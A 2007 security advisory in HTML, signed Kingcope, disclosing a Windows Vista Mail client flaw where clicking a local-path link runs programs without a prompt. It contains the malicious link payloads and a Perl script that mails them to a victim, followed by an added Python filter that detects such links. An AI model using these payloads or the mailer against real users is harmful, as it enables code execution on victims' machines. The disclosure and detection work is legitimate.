<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.6000.16386" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff><FONT face=Arial size=2>
<DIV><BR>Microsoft Windows Vista - Windows Mail Client Side Code Execution
Vulnerability<BR>Successfully Tested on Windows Vista Ultimate</DIV>
<DIV> </DIV>
<DIV>Greetings fly out to Alex, wtfomg, Thierry, Andi and Blackzero</DIV>
<DIV> </DIV>
<DIV>Description<BR>Windows Mail is the default Mail Client of Microsoft Windows
Vista.</DIV>
<DIV> </DIV>
<DIV>Vulnerability<BR>Remote code execution is possible if a user clicks on a
maliciously prepared link.<BR>Vista's Mail client will execute any executable file
if a folder with the same name exists beside it.<BR>For example, the victim has a folder
named blah in C:\ and a batch script named blah.bat, also in C:\.<BR>Now if the
victim clicks on a link in the email message whose URL target is set to
C:\blah, the batch script is executed without any prompt.<BR>There is, for
example, a CMD script by default in C:\Windows\System32\ named winrm.cmd<BR>(and
also a folder named winrm inside System32).</DIV>
<DIV> </DIV>
<DIV>Exploit:<BR>Send an HTML email message containing the URL:<BR>&lt;a
href="c:/windows/system32/winrm?"&gt;Click here!&lt;/a&gt;<BR>or<BR>&lt;a
href="c:/windows/system32/migwiz?"&gt;Click here!&lt;/a&gt;<BR>and
winrm.cmd/migwiz.exe gets executed without asking for permission.<BR>These are
just examples.</DIV>
<DIV> </DIV>
<DIV>I could not pass arguments to winrm (hehe, this would be beautiful), but I
guess there are several attack vectors.</DIV>
<DIV> </DIV>
<DIV>Proof of Concept<BR>---snip---<BR># Net::SMTP_auth (CPAN) adds SASL authentication to Net::SMTP<BR>use Net::SMTP_auth;<BR>$smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);</DIV>
<DIV> </DIV>
<DIV># log in to the relay, then set envelope sender and recipient<BR>$smtp->auth('PLAIN', 'username', 'password');<BR>$smtp->mail("attacker\@attacker.com");<BR>$smtp->to("victim\@victim.com");</DIV>
<DIV> </DIV>
<DIV># headers plus an HTML body holding the link from the Exploit section<BR>$msg = "Subject: Vista Remote Code Exec\r\n"<BR>."From: attacker\@attacker.com\r\n"<BR>."To: victim\@victim.com\r\n"<BR>."MIME-Version: 1.0\r\n"<BR>."Content-Type: text/html\r\n\r\n&lt;a href=\"c:/windows/system32/winrm?\"&gt;Click here!&lt;/a&gt;";<BR>$smtp->data();<BR>$smtp->datasend("$msg\n");<BR>$smtp->dataend();<BR>$smtp->quit;<BR>---snip---</DIV>
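<DIV>Added example, not part of Kingcope's advisory: a small Python filter that walks the text/html parts of a raw message and flags every anchor whose href points at the recipient's own filesystem, which is the trait the messages above share and what a mail gateway or client would want to catch. It goes a little beyond the advisory by also matching file: URLs and UNC paths; the sample messages and all names are constructed here.</DIV>

```python
import email
import re
from html.parser import HTMLParser

# Hrefs that resolve on the recipient's own filesystem: a drive letter
# ("c:/", "C:\"), a file: URL or a UNC path. The last two generalise the
# advisory, which only shows drive-letter paths.
LOCAL_HREF = re.compile(r"^\s*(?:file:|[a-z]:[\\/]|\\\\)", re.IGNORECASE)


class LocalLinkFinder(HTMLParser):
    """Collects every anchor href whose target is a local path."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag/attribute names and unescapes values.
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value and LOCAL_HREF.match(value):
                self.hits.append(value.strip())


def find_local_links(html_body):
    """Return the local-path hrefs found in one HTML fragment."""
    parser = LocalLinkFinder()
    parser.feed(html_body)
    parser.close()
    return parser.hits


def scan_message(raw_message):
    """Scan every text/html part of a raw RFC 822 message for local links."""
    msg = email.message_from_string(raw_message)
    hits = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "utf-8"
        body = part.get_payload(decode=True).decode(charset, errors="replace")
        hits.extend(find_local_links(body))
    return hits


# Constructed samples: the first has the shape of the message the PoC sends,
# the second is an ordinary web link that must not be flagged.
HEADERS = "Subject: test\r\nMIME-Version: 1.0\r\nContent-Type: text/html\r\n\r\n"
SAMPLE_SUSPECT = HEADERS + '<a href="c:/windows/system32/winrm?">Click here!</a>'
SAMPLE_BENIGN = HEADERS + '<a href="https://example.com/">Click here!</a>'
```

<DIV>scan_message(SAMPLE_SUSPECT) returns ['c:/windows/system32/winrm?'] and scan_message(SAMPLE_BENIGN) returns [].</DIV>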
<DIV> </DIV>
<DIV><BR>Signed,</DIV>
<DIV> </DIV>
<DIV>Kingcope / kingcope[at]gmx.net / 2007<BR></DIV></FONT></BODY></HTML>